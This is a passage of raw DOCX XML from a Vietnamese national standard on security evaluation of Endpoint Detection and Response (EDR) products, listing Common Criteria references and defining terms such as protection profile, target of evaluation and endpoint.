      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>TCVN 8709-1:2011 (ISO/IEC 15408-1:2009), “Công nghệ thông tin - Các kỹ thuật an toàn - Các tiêu chí đánh giá an toàn CNTT - Phần 1: Giới thiệu và mô hình tổng quát”.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18D8DE57" w14:textId="77777777" w:rsidR="002376CE" w:rsidRPr="00204C5F" w:rsidRDefault="002376CE" w:rsidP="00BD2F41">
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>TCVN 8709-2:2011 (ISO/IEC 15408-2:2008), “Công nghệ thông tin - Các kỹ thuật an toàn - Các tiêu chí đánh giá an toàn CNTT - Phần 2: Các thành phần chức năng an toàn”.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52D665C7" w14:textId="77777777" w:rsidR="002376CE" w:rsidRPr="00204C5F" w:rsidRDefault="002376CE" w:rsidP="00BD2F41">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">TCVN 8709-3:2011 (ISO/IEC 15408-3:2008), “Công nghệ thông tin - Các kỹ thuật an toàn - Các tiêu chí đánh giá an toàn CNTT - Phần </w:t>
      </w:r>
      <w:r w:rsidR="002C6707" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Các thành phần đảm bảo an toàn”.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ECFDA50" w14:textId="77777777" w:rsidR="00B1283F" w:rsidRPr="00204C5F" w:rsidRDefault="00C91B55" w:rsidP="00BD2F41">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="120"/>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="_Toc137476354"/>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">3 Thuật ngữ và </w:t>
      </w:r>
      <w:r w:rsidR="00B1283F" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>định nghĩa</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
      <w:bookmarkEnd w:id="8"/>
    </w:p>
    <w:p w14:paraId="7B444ACD" w14:textId="05F69A3B" w:rsidR="002C4D0B" w:rsidRPr="00204C5F" w:rsidRDefault="002C4D0B" w:rsidP="00BD2F41">
      <w:r w:rsidRPr="00204C5F">
        <w:t>Tiêu chuẩn này sử dụng các thuật ngữ và định nghĩa trong TCVN 8709-1:2011 và các thuật ngữ sau:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02F41032" w14:textId="198230D4" w:rsidR="004D36D4" w:rsidRPr="00204C5F" w:rsidRDefault="004D36D4" w:rsidP="00BD2F41">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.</w:t>
      </w:r>
      <w:r w:rsidR="005873FB" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Hồ sơ bảo vệ cơ sở </w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:t>(Base Protection Profile)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="681DFCC4" w14:textId="77777777" w:rsidR="004D36D4" w:rsidRPr="00204C5F" w:rsidRDefault="004D36D4" w:rsidP="00BD2F41">
      <w:r w:rsidRPr="00204C5F">
        <w:t>Hồ sơ bảo vệ được sử dụng làm cơ sở để xây dựng cấu hình PP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6176EAA8" w14:textId="4AF69792" w:rsidR="004D36D4" w:rsidRPr="00204C5F" w:rsidRDefault="004D36D4" w:rsidP="00BD2F41">
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.</w:t>
      </w:r>
      <w:r w:rsidR="005873FB" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Tiêu chí chung </w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:t>(Common Criteria)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A151EC0" w14:textId="77777777" w:rsidR="004D36D4" w:rsidRPr="00204C5F" w:rsidRDefault="004D36D4" w:rsidP="00BD2F41">
      <w:r w:rsidRPr="00204C5F">
        <w:t>Tiêu chí chung về đánh giá an toàn công nghệ thông tin (Tiêu chuẩn quốc tế ISO/IEC 15408).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="219AA9BE" w14:textId="631DF68C" w:rsidR="004D36D4" w:rsidRPr="00204C5F" w:rsidRDefault="004D36D4" w:rsidP="00BD2F41">
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.</w:t>
      </w:r>
      <w:r w:rsidR="005873FB" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Phương pháp đánh giá chung </w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:t>(Common Evaluation Methodology)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="456EA954" w14:textId="09A05EAF" w:rsidR="004D36D4" w:rsidRPr="00204C5F" w:rsidRDefault="004D36D4" w:rsidP="00BD2F41">
      <w:r w:rsidRPr="00204C5F">
        <w:t xml:space="preserve">Phương pháp đánh giá chung để đánh giá </w:t>
      </w:r>
      <w:r w:rsidR="00A35DB0" w:rsidRPr="00204C5F">
        <w:t>an toàn</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:t xml:space="preserve"> công nghệ thông tin.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="184DB395" w14:textId="1D12B339" w:rsidR="004D36D4" w:rsidRPr="00204C5F" w:rsidRDefault="004D36D4" w:rsidP="00BD2F41">
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.</w:t>
      </w:r>
      <w:r w:rsidR="005873FB" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Môi trường hoạt động </w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:t>(Operational Environment)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77EF1F89" w14:textId="4BA842AD" w:rsidR="004D36D4" w:rsidRPr="00204C5F" w:rsidRDefault="004D36D4" w:rsidP="00BD2F41">
      <w:r w:rsidRPr="00204C5F">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Phần cứng và phần mềm nằm ngoài ranh giới TOE </w:t>
      </w:r>
      <w:r w:rsidR="00285288" w:rsidRPr="00204C5F">
        <w:t xml:space="preserve">hỗ trợ </w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:t>TOE chức năng và chính sách</w:t>
      </w:r>
      <w:r w:rsidR="00A35DB0" w:rsidRPr="00204C5F">
        <w:t xml:space="preserve"> bảo đảm</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A35DB0" w:rsidRPr="00204C5F">
        <w:t>an toàn</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B99C4C1" w14:textId="5C9DE72F" w:rsidR="004D36D4" w:rsidRPr="00204C5F" w:rsidRDefault="004D36D4" w:rsidP="00BD2F41">
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.</w:t>
      </w:r>
      <w:r w:rsidR="005873FB" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Hồ sơ bảo vệ </w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:t>(Protection Profile)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="451DEEDD" w14:textId="1D6BF00E" w:rsidR="004D36D4" w:rsidRPr="00204C5F" w:rsidRDefault="004D36D4" w:rsidP="00BD2F41">
      <w:r w:rsidRPr="00204C5F">
        <w:t xml:space="preserve">Một bộ yêu cầu </w:t>
      </w:r>
      <w:r w:rsidR="00A35DB0" w:rsidRPr="00204C5F">
        <w:t>an toàn</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:t xml:space="preserve"> độc lập với việc thực hiện đối với một danh mục sản phẩm.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28616A74" w14:textId="2CE3E173" w:rsidR="004D36D4" w:rsidRPr="00204C5F" w:rsidRDefault="004D36D4" w:rsidP="00BD2F41">
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.</w:t>
      </w:r>
      <w:r w:rsidR="005873FB" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Cấu hình hồ sơ bảo vệ </w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:t>(Protection Profile Configuration)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C3DB9A2" w14:textId="2077A333" w:rsidR="004D36D4" w:rsidRPr="00204C5F" w:rsidRDefault="004D36D4" w:rsidP="00BD2F41">
      <w:r w:rsidRPr="00204C5F">
        <w:t xml:space="preserve">Một bộ yêu cầu </w:t>
      </w:r>
      <w:r w:rsidR="00A35DB0" w:rsidRPr="00204C5F">
        <w:t>an toàn</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:t xml:space="preserve"> toàn diện cho một loại sản phẩm bao gồm ít nhất một PP cơ sở và ít nhất một PP-Module.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27075F5C" w14:textId="58FD224D" w:rsidR="004D36D4" w:rsidRPr="00204C5F" w:rsidRDefault="004D36D4" w:rsidP="00BD2F41">
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.</w:t>
      </w:r>
      <w:r w:rsidR="005873FB" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> PP- Module </w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:t>(Protection Profile Module)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60E2084A" w14:textId="22B1EDFA" w:rsidR="004D36D4" w:rsidRPr="00204C5F" w:rsidRDefault="004D36D4" w:rsidP="00BD2F41">
      <w:r w:rsidRPr="00204C5F">
        <w:t xml:space="preserve">Một </w:t>
      </w:r>
      <w:r w:rsidR="001F7EBC" w:rsidRPr="00204C5F">
        <w:t>phát biểu</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:t xml:space="preserve"> độc lập về nhu cầu </w:t>
      </w:r>
      <w:r w:rsidR="00A35DB0" w:rsidRPr="00204C5F">
        <w:t>đảm bảo an toàn</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:t xml:space="preserve"> cho một loại TOE bổ sung cho một hoặc nhiều </w:t>
      </w:r>
      <w:r w:rsidR="001F7EBC" w:rsidRPr="00204C5F">
        <w:t>Hồ sơ bảo vệ</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:t xml:space="preserve"> cơ sở.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A64DDBE" w14:textId="748E0885" w:rsidR="004D36D4" w:rsidRPr="00204C5F" w:rsidRDefault="004D36D4" w:rsidP="00BD2F41">
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.</w:t>
      </w:r>
      <w:r w:rsidR="005873FB" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Yêu cầu đảm bảo an toàn </w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:t>(Security Assurance Requirement)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A9B9A36" w14:textId="77777777" w:rsidR="004D36D4" w:rsidRPr="00204C5F" w:rsidRDefault="004D36D4" w:rsidP="00BD2F41">
      <w:r w:rsidRPr="00204C5F">
        <w:t>Yêu cầu để đảm bảo an toàn của TOE.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E7801CD" w14:textId="6F5F0E37" w:rsidR="004D36D4" w:rsidRPr="00204C5F" w:rsidRDefault="004D36D4" w:rsidP="00BD2F41">
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.</w:t>
      </w:r>
      <w:r w:rsidR="005873FB" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>9</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Yêu cầu chức năng an toàn </w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:t>(Security Functional Requirement)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CE9FCCD" w14:textId="5F7AD397" w:rsidR="004D36D4" w:rsidRPr="00204C5F" w:rsidRDefault="004D36D4" w:rsidP="00BD2F41">
      <w:r w:rsidRPr="00204C5F">
        <w:t>Yêu cầu chức năng đảm bảo an toàn của TOE.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07940A89" w14:textId="52121963" w:rsidR="004D36D4" w:rsidRPr="00204C5F" w:rsidRDefault="004D36D4" w:rsidP="00BD2F41">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.</w:t>
      </w:r>
      <w:r w:rsidR="005873FB" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>10</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005157CB" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Mục tiêu</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> an toàn </w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:t>(Security Target)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5564D6E0" w14:textId="787B457A" w:rsidR="004D36D4" w:rsidRPr="00204C5F" w:rsidRDefault="004D36D4" w:rsidP="00BD2F41">
      <w:r w:rsidRPr="00204C5F">
        <w:t xml:space="preserve">Một tập hợp các yêu cầu </w:t>
      </w:r>
      <w:r w:rsidR="00A35DB0" w:rsidRPr="00204C5F">
        <w:t>đảm bảo an toàn</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:t xml:space="preserve"> phụ thuộc vào việc triển khai cho một sản phẩm cụ thể.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1894368E" w14:textId="3A33311D" w:rsidR="004D36D4" w:rsidRPr="00204C5F" w:rsidRDefault="004D36D4" w:rsidP="00BD2F41">
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.1</w:t>
      </w:r>
      <w:r w:rsidR="005873FB" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Chức năng an toàn của TOE </w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:t>(TOE Security Functionality)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08FD9DA3" w14:textId="0D54D5C5" w:rsidR="004D36D4" w:rsidRPr="00204C5F" w:rsidRDefault="004D36D4" w:rsidP="00BD2F41">
      <w:r w:rsidRPr="00204C5F">
        <w:t xml:space="preserve">Chức năng </w:t>
      </w:r>
      <w:r w:rsidR="00A35DB0" w:rsidRPr="00204C5F">
        <w:t>an toàn</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:t xml:space="preserve"> của sản phẩm đang được đánh giá.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04952499" w14:textId="53B700E4" w:rsidR="004D36D4" w:rsidRPr="00204C5F" w:rsidRDefault="004D36D4" w:rsidP="00BD2F41">
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.1</w:t>
      </w:r>
      <w:r w:rsidR="005873FB" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Mô tả cấu hình TOE </w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:t>(TOE Summary Specification)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68A9C5C4" w14:textId="2D9678BC" w:rsidR="004D36D4" w:rsidRPr="00204C5F" w:rsidRDefault="004D36D4" w:rsidP="00BD2F41">
      <w:r w:rsidRPr="00204C5F">
        <w:t>Mô tả về cách TOE đáp ứng SFRs trong ST.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5414D548" w14:textId="6F55A729" w:rsidR="004D36D4" w:rsidRPr="00204C5F" w:rsidRDefault="004D36D4" w:rsidP="00BD2F41">
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.1</w:t>
      </w:r>
      <w:r w:rsidR="005873FB" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Đ</w:t>
      </w:r>
      <w:r w:rsidR="001F7EBC" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ối tượng</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> đánh giá </w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:t>(Target of Evaluation)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E470645" w14:textId="77777777" w:rsidR="004D36D4" w:rsidRPr="00204C5F" w:rsidRDefault="004D36D4" w:rsidP="00BD2F41">
      <w:r w:rsidRPr="00204C5F">
        <w:t>Sản phẩm đang được đánh giá.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45C85A1C" w14:textId="56B76E33" w:rsidR="004D36D4" w:rsidRPr="00204C5F" w:rsidRDefault="004D36D4" w:rsidP="00BD2F41">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.1</w:t>
      </w:r>
      <w:r w:rsidR="005873FB" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Cảnh báo </w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:t>(Alert)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3235C43B" w14:textId="21C67B8C" w:rsidR="004D36D4" w:rsidRPr="00204C5F" w:rsidRDefault="004D36D4" w:rsidP="00BD2F41">
      <w:r w:rsidRPr="00204C5F">
        <w:t xml:space="preserve">Sự kiện hoặc thông báo trên giao diện quản trị làm nổi bật </w:t>
      </w:r>
      <w:r w:rsidR="005873FB" w:rsidRPr="00204C5F">
        <w:t>hoạt động có khả năng trái phép</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53B5E007" w14:textId="7A857993" w:rsidR="004D36D4" w:rsidRPr="00204C5F" w:rsidRDefault="004D36D4" w:rsidP="00BD2F41">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.1</w:t>
      </w:r>
      <w:r w:rsidR="005873FB" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Điểm cuối </w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:t>(Endpoint)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03604929" w14:textId="0523BE03" w:rsidR="004D36D4" w:rsidRPr="00204C5F" w:rsidRDefault="004D36D4" w:rsidP="00BD2F41">
      <w:r w:rsidRPr="00204C5F">
        <w:t xml:space="preserve">Thiết bị công nghệ thông tin chạy hệ điều hành đa năng, hệ điều hành thiết bị di động hoặc </w:t>
      </w:r>
      <w:r w:rsidR="001F7EBC" w:rsidRPr="00204C5F">
        <w:t xml:space="preserve">hệ điều hành </w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:t xml:space="preserve">thiết bị mạng. </w:t>
      </w:r>
      <w:r w:rsidR="001F7EBC" w:rsidRPr="00204C5F">
        <w:t>Đ</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:t>iểm cuối có thể bao gồm máy tính để bàn, máy chủ và thiết bị di động.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FE34A7E" w14:textId="6E54F433" w:rsidR="004D36D4" w:rsidRPr="00204C5F" w:rsidRDefault="004D36D4" w:rsidP="00BD2F41">
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.1</w:t>
      </w:r>
      <w:r w:rsidR="005873FB" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Phát hiện và </w:t>
      </w:r>
      <w:r w:rsidR="00204C5F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>phản hồi</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> đ</w:t>
      </w:r>
      <w:r w:rsidR="005157CB" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>iểm</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> cuối </w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:t>(Endpoint Detection and Response)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DAD77C5" w14:textId="0BC6E011" w:rsidR="004D36D4" w:rsidRPr="00204C5F" w:rsidRDefault="004D36D4" w:rsidP="00BD2F41">
      <w:r w:rsidRPr="00204C5F">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Phần mềm máy chủ phân tích dữ liệu </w:t>
      </w:r>
      <w:r w:rsidR="00561FC6" w:rsidRPr="00204C5F">
        <w:t xml:space="preserve">máy chủ </w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:t>EDR</w:t>
      </w:r>
      <w:r w:rsidR="00561FC6" w:rsidRPr="00204C5F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:t>được thu thập để phát hiện, điều tra, khắc phục các hoạt động trái phép trên các điểm cuối. Các thuật ngữ TOE và EDR có thể hoán đổi cho nhau trong tài liệu này.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32D8C305" w14:textId="59E91F61" w:rsidR="004D36D4" w:rsidRPr="00204C5F" w:rsidRDefault="004D36D4" w:rsidP="00BD2F41">
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.</w:t>
      </w:r>
      <w:r w:rsidR="005873FB" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>17</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Hệ thống phát hiện và </w:t>
      </w:r>
      <w:r w:rsidR="00204C5F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>phản hồi</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005157CB" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>điểm cuối</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:t>(Endpoint Detection and Response System)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40BE536F" w14:textId="0B3BB93A" w:rsidR="004D36D4" w:rsidRPr="00204C5F" w:rsidRDefault="004D36D4" w:rsidP="00BD2F41">
      <w:r w:rsidRPr="00204C5F">
        <w:t xml:space="preserve">Máy chủ EDR và </w:t>
      </w:r>
      <w:r w:rsidR="00561FC6" w:rsidRPr="00204C5F">
        <w:t>các tác nhân máy chủ</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:t xml:space="preserve"> có hoạt động đồng thời.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6093A123" w14:textId="0F1346B6" w:rsidR="004D36D4" w:rsidRPr="00204C5F" w:rsidRDefault="004D36D4" w:rsidP="00BD2F41">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
